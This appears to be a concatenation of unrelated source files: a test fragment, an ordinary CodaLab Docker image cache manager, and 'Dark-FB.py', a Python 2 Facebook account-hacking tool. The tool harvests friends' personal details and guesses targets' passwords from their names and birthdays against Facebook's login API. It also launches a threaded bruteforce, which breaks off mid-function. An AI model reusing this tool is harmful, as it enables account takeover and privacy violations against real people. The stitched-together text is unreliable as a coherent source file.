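    assert abs(float(sitk.GetArrayViewFromImage(ice_map)[4, 4, 4])) < 1e-6
    return average_ice, maximum_ice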
|
docker_image_manager.py
|
from collections import namedtuple
import threading
import time
import traceback
import logging
import docker
from docker import DockerClient
from codalab.lib.telemetry_util import capture_exception, using_sentry
import codalab.worker.docker_utils as docker_utils
from .docker_utils import DEFAULT_DOCKER_TIMEOUT
from codalab.worker.fsm import DependencyStage
from codalab.worker.state_committer import JsonStateCommitter
from codalab.worker.worker_thread import ThreadDict
from codalab.lib.formatting import size_str
logger = logging.getLogger(__name__)
# Stores the download state of a Docker image: the digest being pulled, its
# DependencyStage, and the relevant status message from the download.
ImageAvailabilityState = namedtuple('ImageAvailabilityState', ['digest', 'stage', 'message'])
# Stores information relevant to the caching of docker images
ImageCacheEntry = namedtuple(
'ImageCacheEntry', ['id', 'digest', 'last_used', 'virtual_size', 'marginal_size']
)
class DockerImageManager:
CACHE_TAG = 'codalab-image-cache/last-used'
def __init__(self, commit_file, max_image_cache_size, max_image_size):
"""
Initializes a DockerImageManager
:param commit_file: String path to where the state file should be committed
:param max_image_cache_size: Total size in bytes that the image cache can use
:param max_image_size: Total size in bytes that the image can have
"""
self._state_committer = JsonStateCommitter(commit_file) # type: JsonStateCommitter
self._docker = docker.from_env(timeout=DEFAULT_DOCKER_TIMEOUT) # type: DockerClient
self._downloading = ThreadDict(
fields={'success': False, 'status': 'Download starting.'}, lock=True
)
self._max_image_cache_size = max_image_cache_size
self._max_image_size = max_image_size
self._stop = False
self._sleep_secs = 10
self._cleanup_thread = None
def start(self):
logger.info("Starting docker image manager")
if self._max_image_cache_size:
def cleanup_loop(self):
while not self._stop:
try:
self._cleanup()
except Exception:
traceback.print_exc()
time.sleep(self._sleep_secs)
self._cleanup_thread = threading.Thread(target=cleanup_loop, args=[self])
self._cleanup_thread.start()
def stop(self):
logger.info("Stopping docker image manager")
self._stop = True
logger.debug("Stopping docker image manager: stop the downloads threads")
self._downloading.stop()
if self._cleanup_thread:
logger.debug("Stopping docker image manager: stop the cleanup thread")
self._cleanup_thread.join()
logger.info("Stopped docker image manager")
def _get_cache_use(self):
return sum(
float(image.attrs['VirtualSize']) for image in self._docker.images.list(self.CACHE_TAG)
)
def _cleanup(self):
"""
Prunes the image cache for runs.
1. Only care about images we (this DockerImageManager) downloaded and know about.
2. We also try to prune any dangling docker images on the system.
        3. We use the sum of VirtualSize's, which is an upper bound on the disk use of our images:
            if no images share any intermediate layers this is the real disk use; however, if
            images share layers, the virtual size counts each shared layer once for every image
            that uses it, even though the layer is stored only once on disk. The 'Size' field
            accounts for the marginal size each image adds on top of the shared layers, but
            summing those is not accurate either, since the shared base layers must be counted
            once to get the total size (i.e. summing marginal sizes gives a lower bound on the
            total disk use of the images). Calling df gives an accurate disk use of ALL the
            images on the machine, but because of (1) we don't want to use that.
"""
# Sort the image cache in LRU order
def last_used(image):
for tag in image.tags:
if tag.split(":")[0] == self.CACHE_TAG:
return float(tag.split(":")[1])
cache_use = self._get_cache_use()
if cache_use > self._max_image_cache_size:
logger.info(
'Disk use (%s) > max cache size (%s): starting image pruning',
cache_use,
self._max_image_cache_size,
)
all_images = self._docker.images.list(self.CACHE_TAG)
all_images_sorted = sorted(all_images, key=last_used)
logger.info("Cached docker images: {}".format(all_images_sorted))
for image in all_images_sorted:
# We re-list all the images to get an updated total size since we may have deleted some
cache_use = self._get_cache_use()
if cache_use > self._max_image_cache_size:
image_tag = (
image.attrs['RepoTags'][-1]
if len(image.attrs['RepoTags']) > 0
else '<none>'
)
logger.info(
'Disk use (%s) > max cache size (%s), pruning image: %s',
cache_use,
self._max_image_cache_size,
image_tag,
)
try:
self._docker.images.remove(image.id, force=True)
except docker.errors.APIError as err:
# Two types of 409 Client Error can be thrown here:
# 1. 409 Client Error: Conflict ("conflict: unable to delete <image_id> (cannot be forced)")
# This happens when an image either has a running container or has multiple child dependents.
# 2. 409 Client Error: Conflict ("conflict: unable to delete <image_id> (must be forced)")
# This happens when an image is referenced in multiple repositories.
                        # We can only remove images in the 2nd case using force=True, but not in the 1st case. So after
                        # we try to remove the image using force=True, a failure indicates that we were trying to
                        # remove an image in the 1st case. Since we can't do much for images in the 1st case, we
                        # just continue with our lives, hoping it will get deleted once it's no longer in use and
                        # the cache becomes full again.
logger.warning(
"Cannot forcibly remove image %s from cache: %s", image_tag, err
)
logger.debug("Stopping docker image manager cleanup")
def get(self, image_spec):
"""
        Request the newest docker image from Docker Hub if it is not already in a downloading thread,
        and return the current download status (READY, FAILED, or DOWNLOADING).
        Depending on the state of the requested image:
        1. If it's not available on the platform, we download the image and return DOWNLOADING status.
        2. If another thread is actively downloading it, we return DOWNLOADING status.
        3. If another thread was downloading it but is no longer active by the time the request was sent,
           we return one of the following statuses:
            * READY if the image was downloaded successfully.
            * FAILED if the image could not be downloaded for any reason.
        :param image_spec: Repo image_spec of the docker image being requested
        :returns: An ImageAvailabilityState object with the state of the docker image
"""
def image_availability_state(image_spec, success_message, failure_message):
"""
Try to get the image specified by image_spec from host machine.
Return ImageAvailabilityState.
"""
try:
image = self._docker.images.get(image_spec)
digests = image.attrs.get('RepoDigests', [image_spec])
digest = digests[0] if len(digests) > 0 else None
new_timestamp = str(time.time())
image.tag(self.CACHE_TAG, tag=new_timestamp)
for tag in image.tags:
tag_label, timestamp = tag.split(":")
# remove any other timestamp but not the current one
if tag_label == self.CACHE_TAG and timestamp != new_timestamp:
try:
self._docker.images.remove(tag)
except docker.errors.NotFound as err:
# It's possible that we get a 404 not found error here when removing the image,
# since another worker on the same system has already done so. We just
# ignore this 404, since any extraneous tags will be removed during the next iteration.
logger.warning(
"Attempted to remove image %s from cache, but image was not found: %s",
tag,
err,
)
return ImageAvailabilityState(
digest=digest, stage=DependencyStage.READY, message=success_message
)
except Exception as ex:
if using_sentry():
capture_exception()
return ImageAvailabilityState(
digest=None, stage=DependencyStage.FAILED, message=failure_message % ex
)
if ':' not in image_spec:
# Both digests and repo:tag kind of specs include the : character. The only case without it is when
# a repo is specified without a tag (like 'latest')
# When this is the case, different images API methods act differently:
# - pull pulls all tags of the image
# - get tries to get `latest` by default
# That means if someone requests a docker image without a tag, and the image does not have a latest
# tag pushed to Dockerhub, pull will succeed since it will pull all other tags, but later get calls
# will fail since the `latest` tag won't be found on the system.
# We don't want to assume what tag the user wanted so we want the pull step to fail if no tag is specified
# and there's no latest tag on dockerhub.
            # Hence, right at the beginning we append the `:latest` tag to the image spec if no tag is specified.
image_spec += ':latest'
try:
if image_spec in self._downloading:
with self._downloading[image_spec]['lock']:
if self._downloading[image_spec].is_alive():
return ImageAvailabilityState(
digest=None,
stage=DependencyStage.DOWNLOADING,
message=self._downloading[image_spec]['status'],
)
else:
if self._downloading[image_spec]['success']:
status = image_availability_state(
image_spec,
success_message='Image ready',
failure_message='Image {} was downloaded successfully, '
'but it cannot be found locally due to unhandled error %s'.format(
image_spec
),
)
else:
status = image_availability_state(
image_spec,
success_message='Image {} can not be downloaded from DockerHub '
'but it is found locally'.format(image_spec),
failure_message=self._downloading[image_spec]['message'] + ": %s",
)
self._downloading.remove(image_spec)
return status
else:
def download():
logger.debug('Downloading Docker image %s', image_spec)
try:
self._docker.images.pull(image_spec)
logger.debug('Download for Docker image %s complete', image_spec)
self._downloading[image_spec]['success'] = True
self._downloading[image_spec]['message'] = "Downloading image"
except (docker.errors.APIError, docker.errors.ImageNotFound) as ex:
logger.debug('Download for Docker image %s failed: %s', image_spec, ex)
self._downloading[image_spec]['success'] = False
self._downloading[image_spec][
'message'
] = "Can't download image: {}".format(ex)
# Check docker image size before pulling from Docker Hub.
# Do not download images larger than self._max_image_size
# Download images if size cannot be obtained
if self._max_image_size:
try:
image_size_bytes = docker_utils.get_image_size_without_pulling(image_spec)
if image_size_bytes is None:
failure_msg = (
"Unable to find Docker image: {} from Docker HTTP Rest API V2. "
"Skipping Docker image size precheck.".format(image_spec)
)
logger.info(failure_msg)
elif image_size_bytes > self._max_image_size:
failure_msg = (
"The size of "
+ image_spec
+ ": {} exceeds the maximum image size allowed {}.".format(
size_str(image_size_bytes), size_str(self._max_image_size)
)
)
return ImageAvailabilityState(
digest=None, stage=DependencyStage.FAILED, message=failure_msg
)
except Exception as ex:
failure_msg = "Cannot fetch image size before pulling Docker image: {} from Docker Hub: {}.".format(
image_spec, ex
)
logger.error(failure_msg)
return ImageAvailabilityState(
digest=None, stage=DependencyStage.FAILED, message=failure_msg
)
self._downloading.add_if_new(image_spec, threading.Thread(target=download, args=[]))
return ImageAvailabilityState(
digest=None,
stage=DependencyStage.DOWNLOADING,
message=self._downloading[image_spec]['status'],
)
except Exception as ex:
return ImageAvailabilityState(
digest=None, stage=DependencyStage.FAILED, message=str(ex)
)
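# Usage sketch (not part of the original module): how a worker might wire up a
# DockerImageManager. The state file path, size limits and image spec below are
# illustrative assumptions, not CodaLab defaults.
def _example_docker_image_manager_usage():
    manager = DockerImageManager(
        commit_file='/tmp/docker-image-state.json',  # hypothetical path
        max_image_cache_size=10 * 1024 ** 3,         # 10 GiB cache budget
        max_image_size=5 * 1024 ** 3,                # reject images above 5 GiB
    )
    manager.start()
    try:
        # get() is non-blocking: it reports DOWNLOADING while a background
        # thread pulls the image, then READY or FAILED on a later call.
        while True:
            state = manager.get('python:3.8-slim')
            if state.stage != DependencyStage.DOWNLOADING:
                break
            time.sleep(1)
        return state
    finally:
        manager.stop()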
|
Dark-FB.py
|
# -*- coding: utf-8 -*-
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;91m[!] Closed'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = " \x1b[1;97m█████████\n \x1b[1;97m█▄█████▄█ \x1b[1;96m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●\n \x1b[1;97m█ \x1b[1;91m▼▼▼▼▼ \x1b[1;97m- _ --_-- \x1b[1;92m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗ \n \x1b[1;97m█ \x1b[1;97m \x1b[1;97m_-_-- -_ --__ \x1b[1;92m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗\n \x1b[1;97m█ \x1b[1;91m▲▲▲▲▲ \x1b[1;97m-- - _ -- \x1b[1;92m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \x1b[1;93mVIP.VPRO\n \x1b[1;97m█████████ \x1b[1;96m«==========✧==========»\n \x1b[1;97m ██ ██\n \x1b[1;97m╔══════════════════════════════════════════════════╗\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mReCode \x1b[1;91m: \x1b[1;96m MR.M4RCH3LL \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mGitHub \x1b[1;91m: \x1b[1;92m \x1b[92mhttps://github.com/m4rche3ll-cyber\x1b[ \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mWA \x1b[1;91m: \x1b[1;92\x1b[92m0838-9235-7370\x1b[ \x1b[1;97m ║ \n \x1b[1;97m╚══════════════════════════════════════════════════╝" '\n[*] Silahkan Login Operamini Agar Tidak Checkpoint\n'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
id = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mMASUK AKUN FACEBOOK \x1b[1;91m[\xe2\x98\x86]'
id = raw_input('\x1b[1;91m[+] \x1b[1;36mEmail \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mSandi \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin success'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
os.system('xdg-open https://www.youtube.com/channel/UCpVqkAi_sqVf-ZPwzRjME0Q')
time.sleep(1)
menu()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAccount Has Been Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print '\n\x1b[1;91m[!] Gagal Masuk'
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print logo
print '\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + nama + (39 - len(nama)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m FBID \x1b[1;91m: \x1b[1;92m' + id + (39 - len(id)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Subs \x1b[1;91m: \x1b[1;92m' + sub + (39 - len(sub)) * '\x1b[1;97m ' + '║'
print '\x1b[1;97m╠' + 50 * '\xe2\x95\x90' + '╝'
print '║-> \x1b[1;37;40m1. User Information'
print '║-> \x1b[1;37;40m2. Hack Facebook Account'
print '║-> \x1b[1;37;40m3. Bot'
print '║-> \x1b[1;37;40m4. Others'
print '║-> \x1b[1;37;40m5. Update'
print '║-> \x1b[1;37;40m6. Logout'
print '║-> \x1b[1;31;40m0. Exit'
print '\x1b[1;37;40m║'
pilih()
def pilih():
zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if zedd == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
os.system('git pull origin master')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
if zedd == '6':
os.system('rm -rf login.txt')
os.system('xdg-open https://m.facebook.com/rizz.magizz')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mName\x1b[1;97m : \x1b[1;91mNot found'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mNot found'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mNot found'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPhone Number\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mPhone Number\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLocation\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLocation\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mBirthday\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mBirthday\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSchool\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mNot found'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] User not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Mini Hack Facebook (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m4. BruteForce (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m5. Yahoo Checker'
print '║-> \x1b[1;37;40m6. Get ID/Email/HP'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
hack_pilih()
def hack_pilih():
hack = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Can\'t empty'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Target must be your friend !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Sorry, opening password target failed :('
print '\x1b[1;91m[!] Try other method.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
